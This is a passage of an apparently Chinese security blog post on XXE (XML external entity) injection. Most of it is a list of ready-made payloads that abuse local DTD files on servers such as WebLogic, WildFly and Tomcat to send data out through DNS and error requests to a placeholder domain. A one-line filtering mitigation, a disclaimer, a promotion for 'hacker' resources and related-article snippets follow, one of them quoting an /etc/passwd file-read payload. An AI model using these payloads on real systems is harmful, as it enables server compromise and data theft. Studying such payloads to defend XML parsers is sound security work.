"dns-exfil-11"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-12"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY &#x25; file "dns-exfil-13"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY &#x25; file "dns-exfil-14"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY &#x25; file "dns-exfil-15"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY &#x25; file "dns-exfil-16"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-17"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-18"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY &#x25; file "dns-exfil-19"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY &#x25; file "dns-exfil-20"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY &#x25; file "dns-exfil-21"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY &#x25; file "dns-exfil-22"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-23"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY &#x25; file "dns-exfil-24"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY &#x25; file "dns-exfil-25"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY &#x25; file "dns-exfil-26"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message>

過濾用戶提交的XML數據,過濾關鍵詞:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC,禁用外部實體引用。

 

 

為了安全請將工具放在虛擬機運行!

作者不易!請點一下關注在走吧!

此分享主要用於學習,切勿走上違法犯罪的不歸路

轉載此文章,請標明出處。

關注此公眾號,各種福利領不停,輕輕鬆鬆學習hacker技術!

掃碼領hacker資料,常用工具,以及各種福利

 

 

 

 

相關焦點

  • 五分鐘了解什麼是XXE漏洞
    xml version="1.0"?><!xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd" >]><x>&b;</x>如果以上xml代碼被解析,則會返回/etc/passwd文件的內容。
  • XXE?我大意了,沒有閃!
    1.XXE原理懂我的人,一般不說我豪橫...XXE漏洞發生在應用程式解析XML輸入時,沒有禁止外部實體的加載,導致可加載惡意外部文件,造成文件讀取、命令執行、內網埠掃描、攻擊內網網站、發起dos攻擊等危害。xxe漏洞觸發的點往往是可以上傳xml文件的位置,沒有對上傳的xml文件進行過濾,導致可上傳惡意xml文件。
  • 文庫 | XML外部實體注入總結(XXE)
    xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY a0 "dos" ><!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;"><!
  • XXE的一些利用方式
    xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!
  • 漏洞經驗分享丨Java審計之XXE(下)
    JDK 1.6 update 35 。在通過訪問以下URL即可訪問到AxisServlet服務,可對其進行XXE漏洞攻擊。https://ip/xxx/servlet/AxisServlethttps://ip/***/servlet/AxisServletPOC:在復現時由於目標主機無法訪問外網,所以需要在本地主機上搭建測試環境,具體的復現過程如下:1)新建目錄xxe_test,複製下面文件放入test.dtd
  • 看代碼學PHP滲透(3) - 實例化任意對象漏洞
    _dc=1530963660916&sort={"Shopware\\Bundle\\SearchBundle\\Sorting\\PriceSorting":{"direction":"asc"}}&conditions={}&shopId=1&currencyId=1&customerGroupKey=EK&page=1&start=0&
  • 微信支付漏洞曝光!0元就可以不付費購買商家物品,商戶要注意了
    就在昨天,白帽匯安全研究院發表消息,有網友公布了微信官方的開發包出現了漏洞。微信的這個漏洞,可能會導致商家的伺服器被入侵,一旦商家的伺服器被侵入,侵入者可以截斷商家與微信官方的聯繫,偽造信息給商家的伺服器,就可以通過假消息來欺騙商家,實現0元買買買,一分錢不用花就可以買任何東西。而商家表面上收到了錢,實際上是個障眼法。微信這個漏洞是怎麼出現的呢?
  • 關於WebSphereApplicationServerXXE高危漏洞的預警通報
    近日,我中心技術支持單位通報:WebSphere Application Server被曝存在XXE(外部實體注入)漏洞,遠程攻擊者可以利用此漏洞來竊取敏感信息。漏洞編號:CVE-2020-4643,安全級別為「高危」。
  • 0元就能買買買,微信支付官方SDK被曝嚴重漏洞
    問題是微信在JAVA版本SDK中的實現存在一個xxe漏洞。 攻擊者可以向通知URL構建惡意payload,根據需要竊取商家伺服器的任何信息。換句話說,黑客利用微信支付的這個漏洞,能實現0元買買買的情況。這並不是說說而已,這位網友還直接甩出了兩張圖,展示出漏洞利用的過程,中招者是vivo和陌陌。
  • 早於iOS7.1!蘋果或發布iOS7.0.7修補漏洞
    上周末突然曝光的SSL連接驗證安全漏洞讓蘋果加緊了更新系統的腳步。截至昨天,蘋果相繼發布了iOS 7.0.6、iOS 6.0.6(針對iPhone 3Gs和iPod touch 4)、Apple TV 6.0.2、OS X 10.9.2幾個新系統,將此前曝光的SSL連接驗證安全漏洞一舉修復。然而,安全專家今日又再次找到了存在於iOS的安全新漏洞,系統更新再次迫在眉睫。
  • 詳解:「熔斷」(Meltdown)漏洞、「幽靈」(Spectre)漏洞
    舉例來講,如果有一個用戶程序試圖訪問一個內核的內存地址,那麼在CPU執行相應指令的過程中會探測到沒有訪問權限,進而觸發中斷/異常,導致程序終結。所以一般情況下,除非惡意程序通過軟體漏洞提權獲得了內核權限,否則是無論如何也繞不過CPU 的權限檢查從而能訪問內核地址的。
  • 關於ThinkPHP 6.0存在任意文件寫入高危漏洞的預警通報
    近日,奇安信補天漏洞響應平臺收到ThinkPHP 6.0任意文件創建漏洞。該漏洞源於ThinkPHP 6.0的某個邏輯漏洞,成功利用此漏洞的攻擊者可以實現「任意」文件創建,在特殊場景下可能會導致GetShell。
  • iOS7.1.1現新漏洞:繞過鎖屏訪問通訊錄
    北京時間5月6日消息,據外媒報導,蘋果新推出的iOS 7.1.1更新依然漏洞百出。國外用戶稱,新系統中可讓任何人輕鬆繞過鎖屏密碼訪問通訊錄,並可直接撥打電話或發送簡訊。iOS7.1.1現新漏洞(圖片來自新浪)    國外用戶反映,目前iOS 7.1.1可在鎖屏情況下繞過解鎖密碼直接訪問通訊錄,而方法則非常簡單,就是通過語音助手Siri。
  • 《寶可夢》遊戲漏洞:會引起錯亂和遊戲死機的0ERROR!
    ,一個篇章是絕對說不完的,那麼,本篇小二就來說說初代的其中一個漏洞,也就是0 ERROR漏洞,那麼,就讓我們來看看這是個怎樣的漏洞吧!「0 ERROR」:這個遊戲漏洞只能在初代的時候被觸發,是年代最為久遠的漏洞之一,這個漏洞之所以會被稱為0 ERROR,是因為如果在觸發漏洞後打開菜單,下方會出現一個含「0 ERROR」字樣的文本框,因此為了做簡單的區分,所以玩家就直接將這個漏洞稱為「0 ERROR」,這個漏洞是最常見的惡性漏洞
  • Fastjson 1.2.47 遠程命令執行漏洞
    話不多說,今天帶大家復現一下Fastjson1.2.47遠程命令執行漏洞。漏洞實現流程準備環境本次漏洞復現需要有三臺設備(兩臺也可以)主機A:模擬Fastjson漏洞環境(centos7)目錄下使用maven進行打包mvn clean package -DskipTests開啟RMI服務(IP-1為主機B的地址)java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer
  • BLURtooth漏洞可使藍牙設備遭中間人攻擊,Bluetooth 4.0/5.0設備皆...
    瑞士及美國大學研究發現藍牙標準存在一項漏洞,可使攻擊者突破藍牙內置的加密機制而黑入設備,或發動中間人攻擊,目前這項漏洞並沒有修補程序。這項漏洞是由瑞士洛桑理科學院(EPFL)及普度大學研究人員發現,並通報Bluetooth SIG及相關機構。本漏洞和藍牙一項名為CTKD(跨傳輸埠密鑰產生,Cross-Transport Key Derivation)的實例有關。
  • 攻擊者利用Sophos防火牆中的0-day代碼執行漏洞
    到2020年的SQL注入漏洞仍然存在。安全公司Sophos的官員周日表示,該公司一個被頻繁使用的防火牆的用戶遭到了0-day攻擊,其目的是竊取用戶名、密碼保護密碼和其他敏感數據。經過充分研究和開發的攻擊利用了Sophos XG Firewall的完全修補版本中的SQL注入漏洞。有了這個系統,它下載並安裝了一系列腳本,這些腳本最終執行了旨在與用戶名,用戶名,密碼的加密哈希形式以及管理員帳戶密碼的SHA256哈希哈希化的代碼。Sophos已發布了一個緩解漏洞的修補程序。
  • 臥底QQ群,揭秘共享單車漏洞:0.4元解鎖!小黃車哭了
    只要學校門口有這種車,小學生幾秒就能打開騎走1、2、3...不到五秒,小學生就解鎖了小黃車讓人不解的是,這種投機取巧的行為,圍觀路人竟然稱讚他們「聰明」不過,好在大部分網友的三觀很正,不少網友對此表明了擔心。明文規定,禁止未滿12歲的兒童自行車上路,小學生們必須強行遵守規定才對!